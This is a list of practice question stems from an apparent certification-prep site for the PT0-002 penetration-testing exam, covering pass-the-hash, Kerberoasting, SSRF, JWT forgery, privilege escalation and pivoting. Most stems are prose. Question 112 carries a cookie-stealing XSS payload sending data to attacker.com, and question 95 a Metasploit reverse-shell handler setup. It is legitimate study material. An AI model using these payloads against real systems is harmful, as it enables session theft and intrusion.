Practice PT0-002 Attacks and Exploits questions with full explanations on every answer.
Start practicing
Attacks and Exploits — choose a session length
Free · No account required
Click any question to see the full explanation and answer options, or start a focused practice session above.
A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?
2During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?
3A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?
4A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?
5During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?
6A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?
7A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?
8A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?
9A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?
10During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?
11A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?
12A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?
13A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?
14A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?
15A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?
16During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?
17A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?
18During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?
19A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?
20A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?
21During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?
22A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?
23Which Metasploit command is used to interact with an established session on a compromised host?
24A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?
25During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?
26A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?
27A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?
28A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?
29During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?
30A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?
31A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?
32During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?
33After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?
34In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:
35During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?
36You have obtained a NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?
37A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?
38During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:
39You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?
40After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?
41Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?
42A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?
43During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?
44You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?
45A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?
46During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?
47A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)
48During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?
49A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?
50A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?
51During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?
52A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?
53A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?
54A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?
55During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?
56A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?
57A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?
58A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?
59During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?
60A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?
61A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?
62During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?
63A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?
64During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?
65A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?
66A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?
67After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?
68During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?
69A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?
70A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?
71During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?
72A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?
73A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)
74During a Windows privilege escalation attempt, a penetration tester discovers that the always elevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)
75A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)
76During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?
77A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?
78During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?
79A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?
80While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?
81A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?
82A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?
83During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?
84A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?
85A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?
86A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?
87After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?
88A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?
89During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?
90A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?
91A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?
92During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?
93A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?
94A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?
95A tester runs the following Metasploit commands: ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.0.5 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run ``` What is the purpose of this configuration?
96A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?
97During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?
98A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?
99A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?
100A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?
101During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?
102A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?
103A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?
104During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?
105A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?
106During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?
107A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?
108During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?
109A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?
110During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?
111A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?
112While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?
113A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?
114During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?
115A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?
116During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?
117A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?
118A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)
119During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)
120A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)
121During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?
122A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?
123A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?
124A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?
125A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?
126During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?
127A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained NTLM hash for a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?
128A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?
129A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?
130A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?
131During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?
132A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?
133A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)
134A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)
135A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)
136During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?
137You have captured an NTLMv2 hash from a LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?
138During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?
139In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?
140Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?
141After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?
142You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?
143During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?
144In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?
145You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?
146During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?
147You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?
148You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)
149During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)
150You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)
151During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?
152A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)
153During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?
154A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?
155While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?
156A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?
157After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?
158A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?
159During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?
160A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?
161After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?
162A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?
163A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)
164During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)
165A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)
166During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?
167A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?
168During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?
169A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?
170A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?
171During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?
172A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?
173A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?
174A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?
175During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?
176A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?
177During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?
178A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?
179During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?
180A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?
181A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?
The Attacks and Exploits domain covers the key concepts tested in this area of the PT0-002 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all PT0-002 domains — no account required.
The Courseiva PT0-002 question bank contains 181 questions in the Attacks and Exploits domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Attacks and Exploits domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included